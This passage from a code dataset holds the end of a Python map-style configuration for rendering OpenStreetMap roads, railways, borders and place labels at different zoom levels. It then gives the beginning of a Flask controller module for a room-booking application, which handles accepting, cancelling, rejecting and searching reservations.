'forest_font': \"sc\",\n 'forest_lbl_size': 8,\n 'forest_lbl_clr': '0 0 0',\n 'forest_lbl_ol_clr': \"255 255 255\",\n 'forest_lbl_ol_width': 2,\n\n 'display_farmland': {0: 0},\n 'farmland_clr': '\"#eef0d5\"',\n\n 'display_grasses': {0: 0},\n 'grass_clr': '\"#cdebb0\"',\n 'display_grass_lbl' : {0: 0, 11:1},\n 'grass_font': \"sc\",\n 'grass_lbl_size': 8,\n 'grass_lbl_clr': '0 0 0',\n 'grass_lbl_ol_clr': \"255 255 255\",\n 'grass_lbl_ol_width': 2,\n\n 'display_orchard': {0: 0},\n 'orchard_clr': '\"#aedfa3\"',\n\n 'display_transport_areas' : {\n 0: 0,\n 11: 1\n },\n 'transport_clr': '200 200 200',\n 'display_transport_lbl' : {\n 0: 0,\n 12:1\n },\n 'transport_font': \"sc\",\n 'transport_lbl_size': 8,\n 'transport_lbl_clr': '0 0 0',\n 'transport_lbl_ol_clr': \"255 255 255\",\n 'transport_lbl_ol_width': 2,\n\n ###### highways #######\n\n 'roads_data': {\n 0: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen0 where type in (\\'trunk\\',\\'motorway\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 8: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 where type in (\\'trunk\\',\\'motorway\\',\\'primary\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 where type in (\\'secondary\\',\\'trunk\\',\\'motorway\\',\\'primary\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 10: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 ) as foo using unique osm_id using srid=OSM_SRID\"',\n 11: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 14: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type||bridge||tunnel as type from OSM_PREFIX_roads order by z_order asc, st_length(geometry) asc) as foo using unique osm_id using srid=OSM_SRID\"',\n },\n\n 'tunnel_opacity': 40,\n\n 'display_bridges': { #also activates tunnels\n 0: 0,\n 14: 1\n },\n 'motorway_bridge_clr': '136 136 136',\n 'motorway_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'trunk_bridge_clr': '136 136 136',\n 'trunk_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'primary_bridge_clr': '136 136 136',\n 'primary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'secondary_bridge_clr': '136 136 136',\n 'secondary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'tertiary_bridge_clr': '136 136 136',\n 'tertiary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'other_bridge_clr': '136 136 136',\n 'other_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'pedestrian_bridge_clr': '136 136 136',\n 'pedestrian_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n\n 'display_highways': {\n 0: 0,\n 5: 1\n },\n\n 'display_motorways': {\n 0: 0,\n 5: 1\n },\n 'display_motorway_links': {\n 0: 0,\n 9: 1\n },\n 'display_motorway_outline': 0,\n 'motorway_clr': '255 255 255',\n 'motorway_width': {\n 0: 0.5,\n 8: 1,\n 9: 2,\n 11: 3,\n 12: 4,\n 14: 5,\n 15: 6,\n 16: 8,\n 17: 9,\n 18: 10\n },\n 'label_motorways': {\n 0: 0,\n 10: 1\n },\n 'motorway_font': \"scb\",\n 'motorway_lbl_size': {\n 0: 8,\n 14: 9\n },\n 'motorway_lbl_clr': '\"#555555\"',\n 'motorway_ol_width': {\n 0: 0.5,\n 10: 1\n },\n 'motorway_ol_clr': \"100 100 100\",\n\n 'display_trunks': {\n 0: 0,\n 5: 1\n },\n 'display_trunk_links': {\n 0: 0,\n 9: 1\n },\n 'display_trunk_outline': 0,\n 'trunk_clr': '255 255 255',\n 'trunk_width': {\n 0: 0.5,\n 8: 1,\n 9: 2,\n 11: 3,\n 12: 4,\n 14: 5,\n 15: 6,\n 16: 8,\n 17: 9,\n 18: 10\n },\n 'label_trunks': {\n 0: 0,\n 10: 1\n },\n 'trunk_font': \"scb\",\n 'trunk_lbl_size': {\n 0: 8,\n 14: 9\n },\n 'trunk_lbl_clr': '\"#555555\"',\n 'trunk_ol_width': {\n 0: 0.5,\n 10: 1\n },\n 'trunk_ol_clr': \"100 100 100\",\n\n 'display_primaries': {\n 0: 0,\n 8: 1\n },\n 'display_primary_outline': 0,\n 'primary_clr': {\n 0: '\"#aaaaaa\"',\n 9: '\"#ffffff\"'\n },\n 'primary_width': {\n 0: 0.5,\n 9: 0.75,\n 10: 1,\n 11: 1.5,\n 12: 2,\n 13: 2.5,\n 14: 3,\n 15: 4,\n 16: 7,\n 17: 8,\n 18: 9\n },\n 'label_primaries': {\n 0: 0,\n 13: 1\n },\n 'primary_font': \"sc\",\n 'primary_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9\n },\n 'primary_lbl_clr': {\n 0: '\"#333333\"'\n },\n 'primary_lbl_ol_clr': {\n 0: '255 255 255'\n },\n 'primary_lbl_ol_width': 2,\n 'primary_ol_width': 1,\n 'primary_ol_clr': \"0 0 0\",\n\n 'display_secondaries': {\n 0: 0,\n 9: 1\n },\n 'display_secondary_outline': 0,\n 'secondary_clr': {\n 0: '\"#aaaaaa\"',\n 10: '\"#ffffff\"'\n },\n 'secondary_width': {\n 0: 0,\n 9: 0.5,\n 10: 0.75,\n 11: 1,\n 12: 1.5,\n 13: 2,\n 14: 2.5,\n 15: 3.5,\n 16: 6,\n 17: 7,\n 18: 8\n },\n 'label_secondaries': {\n 0: 0,\n 13: 1\n },\n 'secondary_font': \"sc\",\n 'secondary_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9\n },\n 'secondary_lbl_clr': '\"#333333\"',\n 'secondary_lbl_ol_clr': '255 255 255',\n 'secondary_lbl_ol_width': 2,\n 'secondary_ol_width': 1,\n 'secondary_ol_clr': \"0 0 0\",\n\n 'display_tertiaries': {\n 0: 0,\n 10: 1\n },\n 'display_tertiary_outline': 0,\n 'tertiary_clr': {\n 0: '\"#aaaaaa\"',\n 13: '\"#ffffff\"'\n },\n 'tertiary_width': {\n 0: 0,\n 10: 0.5,\n 11: 0.75,\n 12: 1,\n 13: 1.5,\n 14: 2,\n 15: 2.5,\n 16: 5,\n 17: 6,\n 18: 7\n },\n 'label_tertiaries': {\n 0: 0,\n 15: 1\n },\n 'tertiary_font': \"sc\",\n 'tertiary_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'tertiary_lbl_clr': '\"#333333\"',\n 'tertiary_lbl_ol_clr': '255 255 255',\n 'tertiary_lbl_ol_width': 2,\n 'tertiary_ol_width': 1,\n 'tertiary_ol_clr': \"0 0 0\",\n\n 'display_other_roads': {\n 0: 0,\n 11: 1\n },\n 'display_other_outline': 0,\n 'other_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"'\n },\n 'other_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 4,\n 17: 5,\n 18: 6,\n },\n 'label_other_roads': {\n 0: 0,\n 15: 1\n },\n 'other_font': \"sc\",\n 'other_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'other_lbl_clr': '\"#333333\"',\n 'other_lbl_ol_clr': '255 255 255',\n 'other_lbl_ol_width': 2,\n 'other_ol_width': 1,\n 'other_ol_clr': \"0 0 0\",\n\n 'display_pedestrian': {\n 0: 0,\n 12: 1\n },\n 'display_pedestrian_outline': 0,\n 'pedestrian_clr': '\"#f2f2ed\"',\n 'pedestrian_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 2.5,\n 17: 3,\n 18: 3.5,\n },\n 'label_pedestrian': {\n 0: 0,\n 15: 1\n },\n 'display_pedestrian_lbl': {\n 0: 0,\n 12: 1\n },\n 'pedestrian_font': \"sc\",\n 'pedestrian_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'pedestrian_lbl_clr': '\"#333333\"',\n 'pedestrian_lbl_ol_clr': '255 255 255',\n 'pedestrian_lbl_ol_width': 2,\n 'pedestrian_ol_width': 1,\n 'pedestrian_ol_clr': \"0 0 0\",\n\n 'display_tracks': {\n 0: 0,\n 12: 1\n },\n 'display_track_outline': 0,\n 'track_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"',\n },\n 'track_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 15: 1,\n },\n 'track_pattern': {\n 0: '2 2',\n 15: '2 3'\n },\n 'label_track': {\n 0: 0,\n 15: 1\n },\n 'track_font': \"sc\",\n 'track_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'track_lbl_clr': '\"#333333\"',\n 'track_lbl_ol_clr': '255 255 255',\n 'track_lbl_ol_width': 2,\n 'track_ol_width': 1,\n 'track_ol_clr': \"0 0 0\",\n\n 'display_footways': {\n 0: 0,\n 15: 1\n },\n 'display_footway_outline': 0,\n 'footway_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"',\n },\n 'footway_width': {\n 0: 0,\n 15: 1,\n },\n 'footway_pattern': '2 3',\n 'footway_ol_width': 1,\n 'footway_ol_clr': \"0 0 0\",\n\n ###### railways ########\n 'display_railways': {\n 0: 0,\n 8: 1\n },\n 'railway_clr': '\"#777777\"',\n 'railway_width': {\n 0: 0.5,\n 10: 1\n },\n 'railway_ol_clr': '\"#777777\"',\n 'railway_ol_width': 0,\n 'railway_pattern': '2 2',\n 'railway_tunnel_opacity': 40,\n 'railways_data': {\n 0: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways_gen0 where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 6: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways_gen1 where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n\n ##### borders ######\n 'border_data': '\"data/boundaries.shp\"',\n 'border_epsg': {\n 0: '\"init=epsg:4326\"'\n },\n\n 'display_border_2': {\n 0: 1\n },\n 'display_border_2_outer': {\n 0: 0,\n 6: 1\n },\n 'border_2_clr': {\n 0: '\"#CDCBC6\"'\n },\n 'border_2_width': {\n 0: '5'\n },\n 'border_2_inner_clr': {\n 0: '\"#CDCBC6\"',\n 4: '\"#8d8b8d\"'\n },\n 'border_2_inner_width': {\n 0: '0.5',\n 7: '1'\n },\n 'border_2_inner_pattern': {\n 0: ''\n },\n # 'display_border_4': {\n # 0: 0,\n # 6: 1\n # },\n # 'display_border_4_outer': {\n # 0: 0,\n # 7: 1\n # },\n # 'border_4_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_4_width': {\n # 0: '5',\n # 8: '6'\n # },\n # 'border_4_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_4_inner_width': {\n # 0: '0.5',\n # 7: '1'\n # },\n # 'border_4_inner_pattern': {\n # 0: '',\n # 7: 'PATTERN 2 2 END'\n # },\n # 'display_border_6': {\n # 0: 0,\n # 7: 1\n # },\n # 'display_border_6_outer': {\n # 0: 0,\n # 9: 1\n # },\n # 'border_6_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_6_width': {\n # 0: '5',\n # 13: '7'\n # },\n # 'border_6_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_6_inner_width': {\n # 0: '0.5',\n # 9: 1\n # },\n # 'border_6_inner_pattern': {\n # 0: '',\n # 9: 'PATTERN 2 2 END'\n # },\n # 'display_border_8': {\n # 0: 0,\n # 11: 1\n # },\n # 'display_border_8_outer': {\n # 0: 0,\n # 13: 1\n # },\n # 'border_8_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_8_width': {\n # 0: '5'\n # },\n # 'border_8_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_8_inner_width': {\n # 0: '0.5',\n # 14: '1'\n # },\n # 'border_8_inner_pattern': {\n # 0: '',\n # 13: 'PATTERN 2 2 END'\n # },\n\n\n ###### buildings ######\n 'display_buildings': {\n 0: 0,\n 15: 1\n },\n 'building_clr': '\"#bbbbbb\"',\n 'building_ol_clr': '\"#333333\"',\n 'building_ol_width': {\n 0: 0,\n 16: 0.1,\n 17: 0.5\n },\n 'building_font': \"sc\",\n 'building_lbl_clr': \"0 0 0\",\n 'building_lbl_size': 8,\n 'building_lbl_ol_clr': \"255 255 255\",\n 'building_lbl_ol_width': 2,\n 'label_buildings': {\n 0: 0,\n 15: 1\n },\n\n 'display_housenumbers': {\n 0: 0,\n 18: 1\n },\n 'housenumbers_font': \"sc\",\n 'housenumbers_lbl_clr': '\"#808080\"',\n 'housenumbers_lbl_size': 8,\n 'housenumbers_lbl_ol_clr': \"255 255 255\",\n 'housenumbers_lbl_ol_width': 1,\n\n\n ####### aeroways #######\n 'display_aeroways': {\n 0: 0,\n 10: 1\n },\n 'runway_clr': \"180 180 180\",\n 'runway_width': {\n 0: 1,\n 11: 2,\n 12: 3,\n 13: 5,\n 14: 7,\n 15: 11,\n 16: 15,\n 17: 19,\n 18: 23\n },\n 'runway_center_clr': '80 80 80',\n 'runway_center_width': {\n 0: 0,\n 15: 1\n },\n 'runway_center_pattern' : '2 2',\n 'taxiway_width': {\n 0: 0,\n 10: 0.2,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 3,\n 17: 4,\n 18: 5\n },\n 'taxiway_clr': \"180 180 180\",\n\n ###### places ######\n 'places_data': {\n 0: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'country\\',\\'continent\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 3: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'country\\',\\'continent\\',\\'city\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 8: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'city\\',\\'town\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 11: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'city\\',\\'town\\',\\'village\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 13: '\"geometry from (select * from OSM_PREFIX_places where OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n },\n 'display_capitals': 0,\n 'display_capital_symbol': {\n 0: 1,\n 10: 0\n },\n 'capital_lbl_size': {\n 0: 0,\n 3: 8,\n 8: 9,\n 10: 10,\n 13: 11,\n 15: 12\n\n },\n 'capital_size': 6,\n 'capital_fg_size': 2,\n 'capital_ol_clr': \"0 0 0\",\n 'capital_fg_clr': \"0 0 0\",\n 'capital_clr': \"255 0 0\",\n 'capital_font': \"sc\",\n 'capital_lbl_clr': \"0 0 0\",\n 'capital_lbl_ol_clr': \"255 255 255\",\n 'capital_lbl_ol_width': 2,\n\n 'display_continents': {\n 0: 1,\n 3: 0\n },\n 'continent_lbl_size': 8,\n 'continent_lbl_clr': \"100 100 100\",\n 'continent_lbl_ol_width': \"1\",\n 'continent_lbl_ol_clr': \"-1 -1 -1\",\n 'continent_font': \"scb\",\n\n 'display_countries': {\n 0: 0,\n 2: 1,\n 8: 0\n },\n 'country_lbl_size': 8,\n 'country_lbl_clr': \"100 100 100\",\n 'country_lbl_ol_width': 2,\n 'country_lbl_ol_clr': \"-1 -1 -1\",\n 'country_font': \"scb\",\n\n 'display_cities': {\n 0: 0,\n 3: 1,\n 16: 0\n },\n 'display_city_symbol': {\n 0: 1,\n 10: 0\n },\n 'city_lbl_size': {\n 0: 0,\n 3: 8,\n 8: 9,\n 10: 10,\n 11: 11,\n 13: 12,\n 15: 13\n },\n 'city_size': {\n 0: 5,\n 8: 6\n },\n 'city_ol_clr': \"0 0 0\",\n 'city_clr': {\n 0: \"200 200 200\",\n 8: \"255 255 255\"\n },\n 'city_font': \"sc\",\n 'city_lbl_clr': {\n 0: \"68 68 68\",\n 8: '0 0 0'\n },\n 'city_lbl_ol_clr': \"255 255 255\",\n 'city_lbl_ol_width': {\n 0: 2,\n 10: 3\n },\n\n 'display_towns': {\n 0: 0,\n 8: 1\n },\n 'display_town_symbol': {\n 0: 1,\n 12: 0\n },\n 'town_font': \"sc\",\n 'town_lbl_clr': {\n 0: '\"#666666\"',\n 11: '0 0 0'\n },\n 'town_lbl_ol_clr': \"255 255 255\",\n 'town_lbl_ol_width': 2,\n 'town_lbl_size': {\n 0: 0,\n 8: 8,\n 10: 9,\n 12: 10,\n 15: 11\n },\n 'town_size': {\n 0: 0,\n 8: 3,\n 10: 5\n },\n 'town_ol_clr': \"0 0 0\",\n 'town_clr': \"200 200 200\",\n\n 'display_suburbs': {\n 0: 0,\n 13: 1\n },\n 'suburb_font': \"sc\",\n 'suburb_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'suburb_lbl_ol_clr': \"255 255 255\",\n 'suburb_lbl_ol_width': 2,\n 'display_suburb_symbol': 0,\n 'suburb_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'suburb_size': 5,\n 'suburb_ol_clr': \"0 0 0\",\n 'suburb_clr': \"200 200 200\",\n\n 'display_villages': {\n 0: 0,\n 12: 1\n },\n 'display_village_symbol': {\n 0: 1,\n 14: 0\n },\n 'village_lbl_size': {\n 0: 0,\n 10: 8,\n 13: 9,\n 15: 10\n },\n 'village_size': {\n 0: 0,\n 11: 3,\n 13: 4\n },\n 'village_ol_clr': \"0 0 0\",\n 'village_clr': \"200 200 200\",\n 'village_font': \"sc\",\n 'village_lbl_clr': {\n 0: '\"#444444\"',\n 13: '0 0 0'\n },\n 'village_lbl_ol_clr': \"255 255 255\",\n 'village_lbl_ol_width': 2,\n\n 'display_hamlets': {\n 0: 0,\n 13: 1\n },\n 'hamlet_font': \"sc\",\n 'hamlet_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'hamlet_lbl_ol_clr': \"255 255 255\",\n 'hamlet_lbl_ol_width': 2,\n 'display_hamlet_symbol': 0,\n 'hamlet_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'hamlet_size': 5,\n 'hamlet_ol_clr': \"0 0 0\",\n 'hamlet_clr': \"200 200 200\",\n\n 'display_localities': {\n 0: 0,\n 13: 1\n },\n 'locality_font': \"sc\",\n 'locality_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'locality_lbl_ol_clr': \"255 255 255\",\n 'locality_lbl_ol_width': 2,\n 'display_locality_symbol': 0,\n 'locality_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'locality_size': 5,\n 'locality_ol_clr': \"0 0 0\",\n 'locality_clr': \"200 200 200\",\n}\n","sub_path":"styles/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470231067","text":"\nfrom collections import defaultdict\nfrom datetime import date, datetime, time, timedelta\n\nimport dateutil\nfrom flask import flash, jsonify, redirect, request, session\nfrom werkzeug.datastructures import MultiDict\nfrom werkzeug.exceptions import Forbidden, NotFound\n\nfrom fossir.core.db import db\nfrom fossir.core.errors import fossirError, NoReportError\nfrom fossir.modules.rb import rb_settings\nfrom fossir.modules.rb.controllers import RHRoomBookingBase\nfrom fossir.modules.rb.forms.reservations import (BookingSearchForm, ModifyBookingForm, NewBookingConfirmForm,\n NewBookingCriteriaForm, NewBookingPeriodForm, NewBookingSimpleForm)\nfrom fossir.modules.rb.models.locations import Location\nfrom fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence\nfrom fossir.modules.rb.models.reservations import RepeatMapping, Reservation\nfrom fossir.modules.rb.models.rooms import Room\nfrom fossir.modules.rb.util import get_default_booking_interval, rb_is_admin\nfrom fossir.modules.rb.views.user.reservations import (WPRoomBookingBookingDetails, WPRoomBookingCalendar,\n WPRoomBookingModifyBooking, WPRoomBookingNewBookingConfirm,\n WPRoomBookingNewBookingSelectPeriod,\n WPRoomBookingNewBookingSelectRoom, WPRoomBookingNewBookingSimple,\n WPRoomBookingSearchBookings, WPRoomBookingSearchBookingsResults)\nfrom fossir.util.date_time import get_datetime_from_request, round_up_to_minutes\nfrom fossir.util.i18n import _\nfrom fossir.util.string import natural_sort_key\nfrom fossir.web.flask.util import url_for\nfrom fossir.web.forms.base import FormDefaults\n\n\nclass RHRoomBookingBookingMixin:\n \"\"\"Mixin that retrieves the booking or fails if there is none.\"\"\"\n def _process_args(self):\n self._reservation = Reservation.get_one(request.view_args['resvID'])\n\n\nclass RHRoomBookingBookingDetails(RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _get_view(self, **kwargs):\n return WPRoomBookingBookingDetails(self, **kwargs)\n\n def _process(self):\n return self._get_view(reservation=self._reservation).display()\n\n\nclass _SuccessUrlDetailsMixin:\n def _get_success_url(self):\n return url_for('rooms.roomBooking-bookingDetails', self._reservation)\n\n\nclass RHRoomBookingAcceptBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_accepted(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if self._reservation.find_overlapping().filter(Reservation.is_accepted).count():\n raise fossirError(_(u\"This reservation couldn't be accepted due to conflicts with other reservations\"))\n if self._reservation.is_pending:\n self._reservation.accept(session.user)\n flash(_(u'Booking accepted'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingCancelBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_cancelled(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if not self._reservation.is_cancelled and not self._reservation.is_rejected:\n self._reservation.cancel(session.user)\n flash(_(u'Booking cancelled'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingRejectBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n self._reason = request.form.get('reason', u'')\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_rejected(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if not self._reservation.is_cancelled and not self._reservation.is_rejected:\n self._reservation.reject(session.user, self._reason)\n flash(_(u'Booking rejected'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingCancelBookingOccurrence(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n occ_date = dateutil.parser.parse(request.view_args['date'], yearfirst=True).date()\n self._occurrence = self._reservation.occurrences.filter(ReservationOccurrence.date == occ_date).one()\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_cancelled(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if self._occurrence.is_valid:\n self._occurrence.cancel(session.user)\n flash(_(u'Booking occurrence cancelled'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingRejectBookingOccurrence(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n occ_date = dateutil.parser.parse(request.view_args['date'], yearfirst=True).date()\n self._reason = request.form.get('reason', u'')\n self._occurrence = self._reservation.occurrences.filter(ReservationOccurrence.date == occ_date).one()\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_rejected(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if self._occurrence.is_valid:\n self._occurrence.reject(session.user, self._reason)\n flash(_(u'Booking occurrence rejected'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingSearchBookings(RHRoomBookingBase):\n menu_item = 'search_bookings'\n show_blockings = True\n CSRF_ENABLED = False\n\n def _get_form_data(self):\n return request.form\n\n def _filter_displayed_rooms(self, rooms, occurrences):\n return rooms\n\n def _process_args(self):\n self._rooms = sorted(Room.find_all(is_active=True), key=lambda r: natural_sort_key(r.full_name))\n self._form_data = self._get_form_data()\n self._form = BookingSearchForm(self._form_data, csrf_enabled=False)\n self._form.room_ids.choices = [(r.id, None) for r in self._rooms]\n\n def _is_submitted(self):\n return self._form.is_submitted()\n\n def _process(self):\n form = self._form\n if self._is_submitted() and form.validate():\n if form.data.get('is_only_my_rooms'):\n form.room_ids.data = [room.id for room in Room.find_all() if room.is_owned_by(session.user)]\n\n occurrences = ReservationOccurrence.find_with_filters(form.data, session.user).all()\n rooms = self._filter_displayed_rooms([r for r in self._rooms if r.id in set(form.room_ids.data)],\n occurrences)\n return WPRoomBookingSearchBookingsResults(self, rooms=rooms, occurrences=occurrences,\n show_blockings=self.show_blockings,\n start_dt=form.start_dt.data, end_dt=form.end_dt.data,\n form=form, form_data=self._form_data,\n menu_item=self.menu_item).display()\n\n my_rooms = [r.id for r in Room.get_owned_by(session.user)]\n return WPRoomBookingSearchBookings(self, errors=form.error_list, rooms=self._rooms, my_rooms=my_rooms,\n form=form).display()\n\n\nclass RHRoomBookingSearchBookingsShortcutBase(RHRoomBookingSearchBookings):\n \"\"\"Base class for searches with predefined criteria\"\"\"\n search_criteria = {}\n show_blockings = False\n\n def _is_submitted(self):\n return True\n\n def _get_form_data(self):\n if request.method == 'POST':\n # Actual form submission (when using the period selector widget)\n return RHRoomBookingSearchBookings._get_form_data(self)\n\n # Class-specific criteria + default times\n data = MultiDict(self.search_criteria)\n data['start_time'] = '00:00'\n data['end_time'] = '23:59'\n data['start_date'] = date.today().strftime('%d/%m/%Y')\n data['end_date'] = (date.today() + timedelta(weeks=1)).strftime('%d/%m/%Y')\n data.setlist('room_ids', [r.id for r in self._rooms])\n return data\n\n\nclass _RoomsWithBookingsMixin:\n def _filter_displayed_rooms(self, rooms, occurrences):\n booked_rooms = {occ.reservation.room_id for occ in occurrences}\n return [r for r in rooms if r.id in booked_rooms]\n\n\nclass _MyRoomsMixin:\n def _filter_displayed_rooms(self, rooms, occurrences):\n return [r for r in rooms if r.is_owned_by(session.user)]\n\n\nclass RHRoomBookingSearchMyBookings(_RoomsWithBookingsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'my_bookings'\n search_criteria = {\n 'is_only_mine': True\n }\n\n\nclass RHRoomBookingSearchBookingsMyRooms(_MyRoomsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'bookings_in_my_rooms'\n search_criteria = {\n 'is_only_my_rooms': True\n }\n\n\nclass RHRoomBookingSearchPendingBookingsMyRooms(_MyRoomsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'prebookings_in_my_rooms'\n search_criteria = {\n 'is_only_my_rooms': True,\n 'is_only_pending_bookings': True\n }\n\n\nclass RHRoomBookingNewBookingBase(RHRoomBookingBase):\n DEFAULT_START_TIME_PRECISION = 15 # minutes\n DEFAULT_BOOKING_DURATION = 90 # minutes\n\n def _make_confirm_form(self, room, step=None, defaults=None, form_class=NewBookingConfirmForm):\n # Note: ALWAYS pass defaults as a kwargs! For-Event room booking depends on it!\n # Step 3\n # If we come from a successful step 2 we take default values from that step once again\n if step == 2:\n defaults.used_equipment = [] # wtforms bug; avoid `foo in None` check\n form = form_class(formdata=MultiDict(), obj=defaults)\n else:\n form = form_class(obj=defaults)\n\n if not room.notification_for_assistance:\n del form.needs_assistance\n\n can_book = room.can_be_booked(session.user)\n can_prebook = room.can_be_prebooked(session.user)\n if room.is_auto_confirm or (not can_prebook or (can_book and room.can_be_booked(session.user, True))):\n # The user has actually the permission to book (not just because he's an admin)\n # Or he simply can't even prebook the room\n del form.submit_prebook\n if not can_book:\n # User can only prebook\n del form.submit_book\n\n form.used_equipment.query = room.find_available_vc_equipment()\n return form\n\n def _get_all_conflicts(self, room, form, reservation_id=None):\n conflicts = defaultdict(list)\n pre_conflicts = defaultdict(list)\n\n candidates = ReservationOccurrence.create_series(form.start_dt.data, form.end_dt.data,\n (form.repeat_frequency.data, form.repeat_interval.data))\n occurrences = ReservationOccurrence.find_overlapping_with(room, candidates, reservation_id).all()\n\n for cand in candidates:\n for occ in occurrences:\n if cand.overlaps(occ):\n if occ.reservation.is_accepted:\n conflicts[cand].append(occ)\n else:\n pre_conflicts[cand].append(occ)\n\n return conflicts, pre_conflicts\n\n def _get_all_occurrences(self, room_ids, form, flexible_days=0, reservation_id=None):\n start_dt = form.start_dt.data\n end_dt = form.end_dt.data\n repeat_frequency = form.repeat_frequency.data\n repeat_interval = form.repeat_interval.data\n day_start_dt = datetime.combine(start_dt.date(), time())\n day_end_dt = datetime.combine(end_dt.date(), time(23, 59))\n flexible_start_dt = day_start_dt - 